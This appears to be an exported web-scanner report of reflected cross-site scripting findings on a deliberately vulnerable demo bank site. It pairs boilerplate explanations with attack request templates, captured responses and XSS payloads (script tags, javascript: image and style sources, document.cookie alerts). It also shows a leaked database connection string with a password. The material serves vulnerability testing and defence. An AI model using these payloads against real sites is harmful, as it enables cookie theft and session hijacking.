Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=<attack>>"><script>alert("XSS")</script></attack>&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\("XSS"\)<\/script>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=</textarea><script>alert('XSS')</script>&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=<attack></textarea><script>alert('XSS')</script></attack>&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)</script>POST /pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=>"'><img%20src="javascript:alert('XSS')">HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:38:21 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 973
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was >"'><img src="javascript:alert('XSS')"><br>
Page was looking for a value in parameter called cboPage<br><br>
<h2>What follows is a dump of the HTTP stuff</h2>
<b>Form Variables Passed:</b><br>cboPage= >"'><img src="javascript:alert('XSS')"><br>
<b>QueryString variables passed:</b><br><pre>****** Head Data***
Client IP:199.72.29.34
Connection: Close
Host: zero.webappsecurity.com
Referer: http://zero.webappsecurity.com:80/pindex.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
****** End of Head Data*******</pre><br>
</body>
</html>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=<attack>>"'><img%20src="javascript:alert('XSS')"></attack>javascript:alert\('XSS'\)">GET /banklogin.asp?err=test@<script>alert(document.cookie)</script>.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:03 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4963
Content-Type: text/html
Cache-control: private
Set-Cookie: state=; path=/
Set-Cookie: userid=; path=/
Set-Cookie: username=; path=/
Set-Cookie: sessionid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER>test@<script>alert(document.cookie)</script>.com<br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?err=<attack>test@<script>alert(document.cookie)</script>.com</attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/login1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
test@<script>alert\(document\.cookie\)POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 187
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=1"style="background:url(javascript:alert('XSS'))"%20"&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 400
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = 1"style="background:url(javascript:alert('XSS'))" "</P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp.bak
Content-Length: 187
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack>&txtLastName=Swinney"style="background:url\(javascript:alert\('XSS'\)\)GET /plink.asp?a=test@<script>alert(document.cookie)</script>.com&c=12 HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:50 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 214
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = test@<script>alert(document.cookie)</script>.com</P>
<P>The parameter "c" = 12</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?a=<attack>test@<script>alert(document.cookie)</script>.com</attack>&c=12 <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
test@<script>alert\(document\.cookie\)GET /scripts/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:26 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>Directory (scripts)<B>Found Directory:</B> /scripts/Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing Apache - Access Control</A>
<BR><BR><B>IIS:</B><BR><A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS Standard Permissions on Your Web Site</A>
<BR> <BR><B>Netscape:</B><BR><A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR><B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password-protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dPOST /pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=test@<script>alert(document.cookie)</script>.comHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:38:14 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 991
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was test@<script>alert(document.cookie)</script>.com<br>
Page was looking for a value in parameter called cboPage<br><br>
<h2>What follows is a dump of the HTTP stuff</h2>
<b>Form Variables Passed:</b><br>cboPage= test@<script>alert(document.cookie)</script>.com<br>
<b>QueryString variables passed:</b><br><pre>****** Head Data***
Client IP:199.72.29.34
Connection: Close
Host: zero.webappsecurity.com
Referer: http://zero.webappsecurity.com:80/pindex.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
****** End of Head Data*******</pre><br>
</body>
</html>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=<attack>test@<script>alert(document.cookie)</script>.com</attack>test@<script>alert\(document\.cookie\)POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=>"><script>alert("XSS")</script>&txtFirstName=Joe&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 348
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
